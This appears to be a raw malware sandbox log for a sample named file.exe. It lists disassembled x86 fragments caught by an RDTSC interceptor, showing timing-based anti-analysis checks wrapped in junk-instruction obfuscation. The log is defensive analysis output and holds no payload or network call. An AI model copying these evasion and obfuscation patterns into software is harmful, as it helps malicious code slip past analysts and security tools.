Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50181 second address: 4B50187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50187 second address: 4B5018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5018B second address: 4B501C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F626941E965h 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 mov ecx, 2B7B5233h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, 18h 0x00000021 mov dx, ax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B501C0 second address: 4B5023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6268DAF3D7h 0x00000011 or ah, FFFFFFAEh 0x00000014 jmp 00007F6268DAF3D9h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F6268DAF3D0h 0x00000020 add si, CE28h 0x00000025 jmp 00007F6268DAF3CBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5023E second address: 4B50242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50242 second address: 4B50248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50248 second address: 4B502A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F626941E960h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F626941E967h 0x00000019 add eax, 4F02157Eh 0x0000001f jmp 00007F626941E969h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B502A3 second address: 4B502DD instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx esi, dx 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007F6268DAF3CFh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop eax 0x00000017 call 00007F6268DAF3D7h 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B502DD second address: 4B50342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E966h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F626941E95Ch 0x00000013 and ax, 4C68h 0x00000018 jmp 00007F626941E95Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F626941E968h 0x00000024 sub ah, FFFFFFC8h 0x00000027 jmp 00007F626941E95Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50342 second address: 4B503B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F6268DAF3CEh 0x0000000f mov eax, dword ptr [75AB4538h] 0x00000014 pushad 0x00000015 movzx eax, dx 0x00000018 mov ax, di 0x0000001b popad 0x0000001c xor dword ptr [ebp-08h], eax 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 popad 0x00000024 xor eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F6268DAF3CBh 0x0000002f xor si, 07CEh 0x00000034 jmp 00007F6268DAF3D9h 0x00000039 popfd 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503B6 second address: 4B503BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 4330h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503BF second address: 4B503DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6268DAF3D1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503DA second address: 4B503E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503E0 second address: 4B503E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503E4 second address: 4B503E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B503E8 second address: 4B5049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6268DAF3D5h 0x00000012 xor ah, 00000016h 0x00000015 jmp 00007F6268DAF3D1h 0x0000001a popfd 0x0000001b push eax 0x0000001c pop ecx 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 pushad 0x00000022 call 00007F6268DAF3CFh 0x00000027 pop eax 0x00000028 popad 0x00000029 mov dword ptr fs:[00000000h], eax 0x0000002f jmp 00007F6268DAF3CEh 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 pushad 0x00000038 call 00007F6268DAF3CEh 0x0000003d jmp 00007F6268DAF3D2h 0x00000042 pop esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushfd 0x00000046 jmp 00007F6268DAF3D1h 0x0000004b and eax, 5652CAE6h 0x00000051 jmp 00007F6268DAF3D1h 0x00000056 popfd 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5049C second address: 4B504FA instructions: 0x00000000 rdtsc 0x00000002 call 00007F626941E960h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr fs:[00000018h] 0x00000011 jmp 00007F626941E961h 0x00000016 mov ecx, dword ptr [eax+00000FDCh] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F626941E95Ch 0x00000023 or esi, 795988E8h 0x00000029 jmp 00007F626941E95Bh 0x0000002e popfd 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 test ecx, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B504FA second address: 4B504FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B504FE second address: 4B50504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50504 second address: 4B5051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5051D second address: 4B50545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F626941E997h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626941E968h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40008 second address: 4B4000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4000C second address: 4B40010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40010 second address: 4B40016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40016 second address: 4B40037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, D061h 0x00000007 mov eax, 380E119Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F626941E95Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40037 second address: 4B400CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 05B85D1Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6268DAF3CCh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F6268DAF3D0h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F6268DAF3CEh 0x00000020 sub eax, 6BA337B8h 0x00000026 jmp 00007F6268DAF3CBh 0x0000002b popfd 0x0000002c popad 0x0000002d sub esp, 2Ch 0x00000030 jmp 00007F6268DAF3D5h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F6268DAF3D6h 0x0000003f sbb cx, 5C78h 0x00000044 jmp 00007F6268DAF3CBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B400CA second address: 4B40131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F626941E969h 0x00000013 add ch, FFFFFFC6h 0x00000016 jmp 00007F626941E961h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f jmp 00007F626941E95Ch 0x00000024 mov bh, cl 0x00000026 popad 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F626941E964h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40131 second address: 4B40137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B401BB second address: 4B401F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F626941E969h 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c inc ebx 0x0000000d pushad 0x0000000e mov dx, B590h 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 test al, al 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F626941E95Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B401F8 second address: 4B401FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B401FE second address: 4B4021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F626941EB9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E95Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4021D second address: 4B4024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3D1h 0x00000009 adc ecx, 423B0426h 0x0000000f jmp 00007F6268DAF3D1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4024C second address: 4B40262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea ecx, dword ptr [ebp-14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 mov ebx, 1C478DC8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40262 second address: 4B40268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40268 second address: 4B4026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B402B9 second address: 4B402BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B402BD second address: 4B402C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B402C3 second address: 4B402E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B402E0 second address: 4B40301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626941E964h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40301 second address: 4B40310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40310 second address: 4B40338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40400 second address: 4B40406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40406 second address: 4B4040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4040A second address: 4B40482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F6268DAF3CBh 0x00000010 jne 00007F62D9CCD441h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F6268DAF3D4h 0x0000001d adc cx, 0A48h 0x00000022 jmp 00007F6268DAF3CBh 0x00000027 popfd 0x00000028 mov bx, cx 0x0000002b popad 0x0000002c mov ebx, dword ptr [ebp+08h] 0x0000002f jmp 00007F6268DAF3D2h 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F6268DAF3D7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40482 second address: 4B40545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, AEFAh 0x00000007 pushfd 0x00000008 jmp 00007F626941E95Bh 0x0000000d jmp 00007F626941E963h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, esi 0x00000017 jmp 00007F626941E966h 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F626941E961h 0x00000024 jmp 00007F626941E95Bh 0x00000029 popfd 0x0000002a pushad 0x0000002b mov cl, 73h 0x0000002d mov ebx, 2F6FFA36h 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 push edx 0x00000037 call 00007F626941E966h 0x0000003c pop eax 0x0000003d pop edx 0x0000003e mov ah, 93h 0x00000040 popad 0x00000041 push esp 0x00000042 jmp 00007F626941E968h 0x00000047 mov dword ptr [esp], eax 0x0000004a pushad 0x0000004b mov si, B9CDh 0x0000004f mov eax, 446C25C9h 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F626941E95Eh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40545 second address: 4B40549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40549 second address: 4B4054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4054F second address: 4B40560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40560 second address: 4B40564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40564 second address: 4B40580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6268DAF3CCh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40580 second address: 4B40584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40584 second address: 4B4058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B4058A second address: 4B40590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40590 second address: 4B40594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B405DD second address: 4B405F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B405F1 second address: 4B30811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F62D9CCD419h 0x00000011 xor eax, eax 0x00000013 jmp 00007F6268D88AFAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne cl 0x00000026 xor ebx, ebx 0x00000028 test cl, 00000001h 0x0000002b jne 00007F6268DAF3C7h 0x0000002d jmp 00007F6268DAF4EAh 0x00000032 call 00007F626CE3BCF6h 0x00000037 mov edi, edi 0x00000039 pushad 0x0000003a call 00007F6268DAF3CEh 0x0000003f pushad 0x00000040 popad 0x00000041 pop eax 0x00000042 jmp 00007F6268DAF3D1h 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F6268DAF3D3h 0x00000052 sbb cx, 963Eh 0x00000057 jmp 00007F6268DAF3D9h 0x0000005c popfd 0x0000005d call 00007F6268DAF3D0h 0x00000062 pop ecx 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B30811 second address: 4B30817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B30817 second address: 4B3081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B3081B second address: 4B30829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B30829 second address: 4B3083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F6268DAF3D0h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B3083F second address: 4B30895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F626941E95Eh 0x00000011 or eax, 4C2BBFF8h 0x00000017 jmp 00007F626941E95Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov esi, 685CD8C5h 0x00000023 mov ch, 3Ch 0x00000025 popad 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F626941E95Fh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B30895 second address: 4B308B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B308B2 second address: 4B308B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B308B8 second address: 4B308BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B308BC second address: 4B308C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B30953 second address: 4B409B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F6268DAF3CEh 0x0000000f ret 0x00000010 nop 0x00000011 jmp 00007F6268DAF3C2h 0x00000013 and bl, 00000001h 0x00000016 movzx eax, bl 0x00000019 lea esp, dword ptr [ebp-0Ch] 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f pop ebp 0x00000020 ret 0x00000021 add esp, 04h 0x00000024 mov eax, dword ptr [00AB60A4h+ebx*4] 0x0000002b mov ecx, 04B3412Ah 0x00000030 xor ecx, dword ptr [00AB60ACh] 0x00000036 add eax, ecx 0x00000038 inc eax 0x00000039 jmp eax 0x0000003b push esi 0x0000003c call 00007F6268DD5598h 0x00000041 push ebp 0x00000042 push ebx 0x00000043 push edi 0x00000044 push esi 0x00000045 sub esp, 00000284h 0x0000004b mov esi, dword ptr [esp+00000298h] 0x00000052 mov dword ptr [esp+00000268h], 00AB8100h 0x0000005d mov dword ptr [esp+00000264h], 0000009Dh 0x00000068 mov dword ptr [esp], 00000000h 0x0000006f mov eax, dword ptr [00AB3D58h] 0x00000074 call eax 0x00000076 mov edi, edi 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b movzx esi, di 0x0000007e mov bl, 9Dh 0x00000080 popad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B409B8 second address: 4B409BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B409BE second address: 4B409C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B409C2 second address: 4B409C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B409C6 second address: 4B40A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6268DAF3D1h 0x00000012 or ecx, 3415F796h 0x00000018 jmp 00007F6268DAF3D1h 0x0000001d popfd 0x0000001e mov bx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40A00 second address: 4B40A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F626941E964h 0x0000000c sbb ah, FFFFFFE8h 0x0000000f jmp 00007F626941E95Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d mov bx, 2A56h 0x00000021 pop ebx 0x00000022 call 00007F626941E95Ch 0x00000027 mov cx, 33E1h 0x0000002b pop esi 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F626941E968h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40A65 second address: 4B40A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
